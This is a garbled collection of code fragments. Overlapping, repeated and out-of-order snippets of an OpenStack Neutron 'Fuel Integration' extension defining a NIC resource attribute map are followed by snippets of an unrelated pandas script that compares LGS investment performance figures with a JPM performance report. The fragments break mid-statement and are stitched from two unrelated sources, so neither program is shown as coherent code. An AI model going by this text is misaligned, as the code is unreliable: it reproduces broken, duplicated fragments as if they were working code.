'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True,", "controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map( attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)", "= RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True,", "'', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True,", "True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True,", "ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2", "resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name +", "}, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "{'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False,", "@classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in", "= _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = {", "'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post':", "'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } } } } class", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } },", "{ 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'', 'validate': { 'type:non_negative': None } }, 
'max_speed': { 'allow_post': True, 'allow_put': True,", "False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True,", "from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN }", "'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put':", "neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr", "{ 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key':", "from neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import", "= 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False,", "'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string':", "True, 'default': '', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor):", "'', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True,", "True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not", "'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver': {", "class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics'", "'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 
'is_visible': True, 'default':", "with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\"", "NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP", "for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name", "could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id':", "'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params,", "[] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') +", "'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post':", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post':", "'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': {", "extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map( attributes,", "from neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron import", "'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 
'allow_post':", "'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post':", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None }", "import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could", "{ 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put':", "be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post':", "in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\",", "Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext", "%(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: {", "'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True,", "allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe':", "return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for", "True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True,", "'name': { 
'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "@classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00'", "+ \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name,", "'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put':", "'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "{ 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return", "'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None }", "} } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def", "base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params)", "attr from neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron", "{ 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'driver':", "found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 
'allow_post': False,", "'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put':", "return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info': {", "attributes as attr from neutron.api.v2 import base from neutron.common import exceptions as nexception", "}, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible':", "}, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate':", "neutron.api.v2 import base from neutron.common import exceptions as nexception from neutron import manager", "} }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } },", "'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': {", "import attributes as attr from neutron.api.v2 import base from neutron.common import exceptions as", "def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod", "'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put':", "'', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': 
True,", "} } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self):", "True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True,", "True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': {", "'', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True,", "key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in", "'', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put': True,", "}, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "= extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel, self).update_attributes_map(", "True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': {", "{ 'type:non_negative': None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': {", "params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts", "True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': {", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None", "} }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 
'validate': { 'type:macaddress': None } },", "resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS =", "} }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info':", "{ 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True },", "{ 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller,", "resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller =", "}, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()]", "get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def", "Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod", "}, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid':", "{ 'type:string': None } }, 
'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "{ NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible':", "{'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "} }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True,", "\"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex", "'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post':", "False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True,", "} }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress':", "message = _(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP =", "{ 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = []", "from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common import", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post':", "= { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None},", "'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 
'is_visible': True }, 'name': { 'allow_post': True, 'allow_put':", "True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True,", "{ 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True,", "not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': {", "ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self, attributes): super(Fuel,", "'', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True,", "} }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def", "for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None", "'default': '', 'validate': { 'type:macaddress': None } }, 'if_type': { 'allow_post': True, 'allow_put':", "neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base", "'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } },", "\"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin,", "False, 'allow_put': False, 'validate': 
{'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': {", "'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'driver':", "= [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin =", "dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex =", "from neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as", "{ 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed':", "'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible':", "} }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None", "@classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def", "= base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel',", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None }", "'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put':", "get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) 
for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals))", "resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name,", "} }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params =", "return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self):", "def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self):", "'default': '', 'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put':", "True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN},", "'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True,", "True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post': True,", "'validate': { 'type:string': None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible':", "Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with", "{ 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True,", "= manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\" params", "}, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'allow_put': True, 'is_visible': 
True, 'default': '', 'validate': { 'type:string': None } }", "\"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts", "'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } },", "True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True,", "'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True,", "return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls):", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:macaddress': None } }, 'if_type':", "allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return exts def update_attributes_map(self,", "def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key,", "import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr from", "'', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True,", "'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative':" ]
[]
[ "'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } )", "accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check", "pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed:", "set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts but are", "= df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm", "ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to", "sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0,", "accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during", "table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1',", "'84_Return': '7 Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants", "'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date =", "but are not checked. 
df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set", "pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'],", "df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market", "pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn))", "Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1", "# Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads", "pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) #", "= pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm =", "values from JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge(", "deviants = [] columns = [] deviations = [] jpm_missing = [] lgs_missing", "= 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD", "set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'})", "checked. 
df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} #", "sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict =", "8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', }", "import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath =", "1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM", "Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM", "Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items =", "Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing", "jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for", "been checked. 
lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are", "columns = [] deviations = [] jpm_missing = [] lgs_missing = [] total_count", "INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict", "df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1", "are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ',", "i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01:", "# jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, #", "df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints", "fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing", "= pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O',", "= 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads", "# df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) #", "# Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS", 